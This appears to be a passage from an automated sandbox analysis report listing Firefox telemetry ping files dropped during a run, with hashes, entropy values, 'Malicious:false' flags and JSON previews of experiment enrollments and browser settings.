                                                                                                                                                                                  SHA-512:AA77E10D59ACE55BF7AEF9BB5B227869FFEFDFC2D7FCD340B11A9599B7680AE8BB60454F1033F9F97D6B904886039018E6DAF2EC178D9F7896BFAD4539BD3A6A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/metrics/1/0662ae79-7d3e-4596-a16d-d1cef2261f61.{"ping_info":{"seq":0,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","reason":"overdue","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7","type":"nimbus-rollout"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","architecture":"x86_64","locale":"en-US","app_channel":"release","os":"Windows","os_version":"10.0","app

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\2143cd64-6046-46d9-bd1d-4fbd6e7367c1 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1538)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                  Entropy (8bit):5.098004499022612
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:BvcHSaayhgWLu4K+U039jHaT+ZSb8+v7g:+Saayy49j6T+ZSb8+vk
                                                                                                                                                                                  MD5:CC201591F549ABC42CDD8B30157C3987
                                                                                                                                                                                  SHA1:AE6FE68D87ED8C58CAF9472ED0DE0AE6E2F7A97B
                                                                                                                                                                                  SHA-256:6651D9362F7E823398A7C39A7BEC7A41074EDAEA76546EE332199B12E0105014
                                                                                                                                                                                  SHA-512:0983E24D2CC5B8C6DCD082287BACC01B205CD844C7C0E4E8A1920A2664DCE09464B7613387F654C37C7572349679DDD012678C37F3741AA8A66AD6A147EDC2C7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/2143cd64-6046-46d9-bd1d-4fbd6e7367c1.{"ping_info":{"seq":12,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","experiments":{"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26","type":"nimbus-rollout"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","build_date":"1970-01-01T00:00:0

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\5e16a81f-1e89-4191-ac33-8ab19a08b66f (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1520)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                  Entropy (8bit):5.0755229654427305
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:EcoWLu4hXOHvjuSarUk78E/7HaZcTSb8+C:44lOHvjuSaUEj6ZcTSb8+C
                                                                                                                                                                                  MD5:EA2A0EB3716522130FA06524EC7A4190
                                                                                                                                                                                  SHA1:A6F32B1A0FF41E8AFDBA6C5B48A84D98D3CB13F5
                                                                                                                                                                                  SHA-256:3E9583676DDB1A5E947E28C5642551914B9106A85DEC051D0B04F13D93355E52
                                                                                                                                                                                  SHA-512:834D2A93F27291AC0510352E0FCCE7D1364E6455B2CDA41C62A6E2F7B4513B66A6C63519017A0C91F71539FECE4B629CDD4238BF2EC2F76AA9CCCD8D2E1C9985
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/5e16a81f-1e89-4191-ac33-8ab19a08b66f.{"ping_info":{"seq":10,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","experiments":{"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"type":"nimbus-nimbus","enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"ap

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\6f7581f3-9c81-406e-b1d2-b9090ab44db1 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (872)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):942
                                                                                                                                                                                  Entropy (8bit):4.992246703524653
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGKg7U+8M4uyeAjjMokBpSwZL7GA++nAa:u7UtM4L/jKBpMAnN
                                                                                                                                                                                  MD5:0471E2BE915ED9BB5EFE7223B783BBD2
                                                                                                                                                                                  SHA1:0D2DEAD3BF0074CDF3F2B882C4CCDF73808FDCE6
                                                                                                                                                                                  SHA-256:152569A1855ADA473DCBA0A1215C3B771E083B6EB15F95DA8660C04EB025C3F0
                                                                                                                                                                                  SHA-512:A2B5D593589BAB6B5F218A0297068C07A2D307BF1D4EBCE109E19FDEDB814A8ADC9610FC121BA2E6F32FA1C28525B3DE6738BE2E486A46B18EE5ABF9CC3AA50B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/newtab/1/6f7581f3-9c81-406e-b1d2-b9090ab44db1.{"ping_info":{"seq":6,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"component_init"},"client_info":{"telemetry_sdk_build":"53.2.0","client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","os":"Windows","os_version":"10.0","architecture":"x86_64","app_build":"20230927232528","app_channel":"release","app_display_version":"118.0.1","locale":"en-US","build_date":"1970-01-01T00:00:00+00:00","first_run_date":"2023-10-05+02:00","windows_build_number":19045},"metrics":{"boolean":{"newtab.search.enabled":true,"pocket.is_signed_in":false,"pocket.enabled":true,"topsites.enabled":true,"topsites.sponsored_enabled":true,"pocket.sponsored_stories_enabled":true},"string":{"newtab.homepage_category":"enabled","newtab.newtab_category":"enabled","newtab.locale":"en-US"},"string_list":{"newtab.blocked_sponsors":[]},"quantity":{"topsites.rows":1}}}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\967d9d50-f397-49d3-8ec0-e15f2a105ac0 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1500)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1572
                                                                                                                                                                                  Entropy (8bit):5.026046602851725
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGc+U/RJgw+RhvXWLXJ5hJWSj+V+JZiXG8++udUojTAfMoNC8M4OBpBwovS2p8:1+AvOH/WLVYSaG8ZuUogLpM4OBpbK2p8
                                                                                                                                                                                  MD5:F3A37B82A5BFA9F3A132A68B62A02552
                                                                                                                                                                                  SHA1:22B377B1E6BE3E350457E5D179359716EAAD6B38
                                                                                                                                                                                  SHA-256:B9862D7A3719239780154AF7AE75161894C202FC70AC4EA534266D83C0B1CCAD
                                                                                                                                                                                  SHA-512:F8E7441E40B41D33B895CD9775E8FC8460C94CAC6EB82549FE4D3DBE9E332A5838F9138BD7AAEB37A78DAE48518E4F18921631D21C075F19E2CA7C3B9C27ACC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/baseline/1/967d9d50-f397-49d3-8ec0-e15f2a105ac0.{"ping_info":{"seq":2,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"active","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","app_build":"2023092723

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\a7791896-2046-4b05-9685-73f32d9a99cc (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2799)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2869
                                                                                                                                                                                  Entropy (8bit):4.919643562920363
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:Tc3BvOH/WLu4KJSarUkppM4sWjopq4cuSmdWLxQepU0pI:TcNOHz4CSalyajo7SndUV
                                                                                                                                                                                  MD5:0C161BC78025C39768D843B9C641ADE6
                                                                                                                                                                                  SHA1:B5A21CF91FF97CABB87E6692CC90E47E2FC7A0EC
                                                                                                                                                                                  SHA-256:C2F19EF60DB076FDB296E9E3C4D0FBEE9DE39FD83C860CE22F6E17A147578B95
                                                                                                                                                                                  SHA-512:3039A7926FE5F67A1DF0739CAD5B7B4521CC6F75AF130FEDD19AB032E161ED93259AD50814BAD557FD00570DAE64766225407BE4832BD212770DD1C0A433E7B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/events/1/a7791896-2046-4b05-9685-73f32d9a99cc.{"ping_info":{"seq":1,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"startup","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"first_run_date":"2023-10-05+02:00","build_date":"1970-01-01T00:00:00+00:00","client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","architecture":"x86_64","loc

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b21f31f8-fb59-4e8d-9fe8-b64d11a07cfa (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1538)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                  Entropy (8bit):5.09652312694415
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:FzvcoWLV9Z0uSaaOHrUP8/tFHa+jZmPb8v7qk:K30uSaaOHs8z6+jZib8v+k
                                                                                                                                                                                  MD5:4F5875201AE6367D24257D8567B9BD3F
                                                                                                                                                                                  SHA1:65BEABC6802767A5E969D7BF8287937BE44ED766
                                                                                                                                                                                  SHA-256:5B64C3F72BE2E4A081269D7B46AB272260392FA99806B4831BFBC5521C31BB2F
                                                                                                                                                                                  SHA-512:9C5359967836FA94384B9558C08362D3F3B354279F94CD8246E7E3266FD4DF5DEDD04CAD3D7C370CEA83B2D0C9845353DA9791CBC6D7AAD047A3E325A7A6C903
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/b21f31f8-fb59-4e8d-9fe8-b64d11a07cfa.{"ping_info":{"seq":11,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","experiments":{"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"type":"nimbus-nimbus","enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","app_display_version":"118.0.1",

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\0662ae79-7d3e-4596-a16d-d1cef2261f61

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10690)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10761
                                                                                                                                                                                  Entropy (8bit):4.715630945657858
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:E4SfP+PCJDFujzXJzT9TA4xGBqhsRnjJxrf1Jps3Cm8M6IHc8Dofa5C8f+zHB9Q:x3abuuNqV+1+
                                                                                                                                                                                  MD5:20C8C5835D2706880EA3052F875F12EB
                                                                                                                                                                                  SHA1:BF7D0A6FF95907DA12300E42BDAA36E9F7D6052B
                                                                                                                                                                                  SHA-256:30D0FE6C4CED94AF1E11468147F874513DC30EFA5400706FF98FD27C42477CB5
                                                                                                                                                                                  SHA-512:AA77E10D59ACE55BF7AEF9BB5B227869FFEFDFC2D7FCD340B11A9599B7680AE8BB60454F1033F9F97D6B904886039018E6DAF2EC178D9F7896BFAD4539BD3A6A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/metrics/1/0662ae79-7d3e-4596-a16d-d1cef2261f61.{"ping_info":{"seq":0,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","reason":"overdue","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7","type":"nimbus-rollout"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","architecture":"x86_64","locale":"en-US","app_channel":"release","os":"Windows","os_version":"10.0","app

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\2143cd64-6046-46d9-bd1d-4fbd6e7367c1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1538)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                  Entropy (8bit):5.098004499022612
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:BvcHSaayhgWLu4K+U039jHaT+ZSb8+v7g:+Saayy49j6T+ZSb8+vk
                                                                                                                                                                                  MD5:CC201591F549ABC42CDD8B30157C3987
                                                                                                                                                                                  SHA1:AE6FE68D87ED8C58CAF9472ED0DE0AE6E2F7A97B
                                                                                                                                                                                  SHA-256:6651D9362F7E823398A7C39A7BEC7A41074EDAEA76546EE332199B12E0105014
                                                                                                                                                                                  SHA-512:0983E24D2CC5B8C6DCD082287BACC01B205CD844C7C0E4E8A1920A2664DCE09464B7613387F654C37C7572349679DDD012678C37F3741AA8A66AD6A147EDC2C7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/2143cd64-6046-46d9-bd1d-4fbd6e7367c1.{"ping_info":{"seq":12,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","experiments":{"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26","type":"nimbus-rollout"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","build_date":"1970-01-01T00:00:0

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\5e16a81f-1e89-4191-ac33-8ab19a08b66f

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1520)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                  Entropy (8bit):5.0755229654427305
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:EcoWLu4hXOHvjuSarUk78E/7HaZcTSb8+C:44lOHvjuSaUEj6ZcTSb8+C
                                                                                                                                                                                  MD5:EA2A0EB3716522130FA06524EC7A4190
                                                                                                                                                                                  SHA1:A6F32B1A0FF41E8AFDBA6C5B48A84D98D3CB13F5
                                                                                                                                                                                  SHA-256:3E9583676DDB1A5E947E28C5642551914B9106A85DEC051D0B04F13D93355E52
                                                                                                                                                                                  SHA-512:834D2A93F27291AC0510352E0FCCE7D1364E6455B2CDA41C62A6E2F7B4513B66A6C63519017A0C91F71539FECE4B629CDD4238BF2EC2F76AA9CCCD8D2E1C9985
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/5e16a81f-1e89-4191-ac33-8ab19a08b66f.{"ping_info":{"seq":10,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","experiments":{"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"type":"nimbus-nimbus","enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"ap

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\6f7581f3-9c81-406e-b1d2-b9090ab44db1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (872)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):942
                                                                                                                                                                                  Entropy (8bit):4.992246703524653
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGKg7U+8M4uyeAjjMokBpSwZL7GA++nAa:u7UtM4L/jKBpMAnN
                                                                                                                                                                                  MD5:0471E2BE915ED9BB5EFE7223B783BBD2
                                                                                                                                                                                  SHA1:0D2DEAD3BF0074CDF3F2B882C4CCDF73808FDCE6
                                                                                                                                                                                  SHA-256:152569A1855ADA473DCBA0A1215C3B771E083B6EB15F95DA8660C04EB025C3F0
                                                                                                                                                                                  SHA-512:A2B5D593589BAB6B5F218A0297068C07A2D307BF1D4EBCE109E19FDEDB814A8ADC9610FC121BA2E6F32FA1C28525B3DE6738BE2E486A46B18EE5ABF9CC3AA50B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/newtab/1/6f7581f3-9c81-406e-b1d2-b9090ab44db1.{"ping_info":{"seq":6,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"component_init"},"client_info":{"telemetry_sdk_build":"53.2.0","client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","os":"Windows","os_version":"10.0","architecture":"x86_64","app_build":"20230927232528","app_channel":"release","app_display_version":"118.0.1","locale":"en-US","build_date":"1970-01-01T00:00:00+00:00","first_run_date":"2023-10-05+02:00","windows_build_number":19045},"metrics":{"boolean":{"newtab.search.enabled":true,"pocket.is_signed_in":false,"pocket.enabled":true,"topsites.enabled":true,"topsites.sponsored_enabled":true,"pocket.sponsored_stories_enabled":true},"string":{"newtab.homepage_category":"enabled","newtab.newtab_category":"enabled","newtab.locale":"en-US"},"string_list":{"newtab.blocked_sponsors":[]},"quantity":{"topsites.rows":1}}}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\967d9d50-f397-49d3-8ec0-e15f2a105ac0

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1500)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1572
                                                                                                                                                                                  Entropy (8bit):5.026046602851725
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGc+U/RJgw+RhvXWLXJ5hJWSj+V+JZiXG8++udUojTAfMoNC8M4OBpBwovS2p8:1+AvOH/WLVYSaG8ZuUogLpM4OBpbK2p8
                                                                                                                                                                                  MD5:F3A37B82A5BFA9F3A132A68B62A02552
                                                                                                                                                                                  SHA1:22B377B1E6BE3E350457E5D179359716EAAD6B38
                                                                                                                                                                                  SHA-256:B9862D7A3719239780154AF7AE75161894C202FC70AC4EA534266D83C0B1CCAD
                                                                                                                                                                                  SHA-512:F8E7441E40B41D33B895CD9775E8FC8460C94CAC6EB82549FE4D3DBE9E332A5838F9138BD7AAEB37A78DAE48518E4F18921631D21C075F19E2CA7C3B9C27ACC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/baseline/1/967d9d50-f397-49d3-8ec0-e15f2a105ac0.{"ping_info":{"seq":2,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"active","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","app_build":"2023092723

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\a7791896-2046-4b05-9685-73f32d9a99cc

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2799)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2869
                                                                                                                                                                                  Entropy (8bit):4.919643562920363
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:Tc3BvOH/WLu4KJSarUkppM4sWjopq4cuSmdWLxQepU0pI:TcNOHz4CSalyajo7SndUV
                                                                                                                                                                                  MD5:0C161BC78025C39768D843B9C641ADE6
                                                                                                                                                                                  SHA1:B5A21CF91FF97CABB87E6692CC90E47E2FC7A0EC
                                                                                                                                                                                  SHA-256:C2F19EF60DB076FDB296E9E3C4D0FBEE9DE39FD83C860CE22F6E17A147578B95
                                                                                                                                                                                  SHA-512:3039A7926FE5F67A1DF0739CAD5B7B4521CC6F75AF130FEDD19AB032E161ED93259AD50814BAD557FD00570DAE64766225407BE4832BD212770DD1C0A433E7B8
                                                                                                                                                                                  Malicious:false
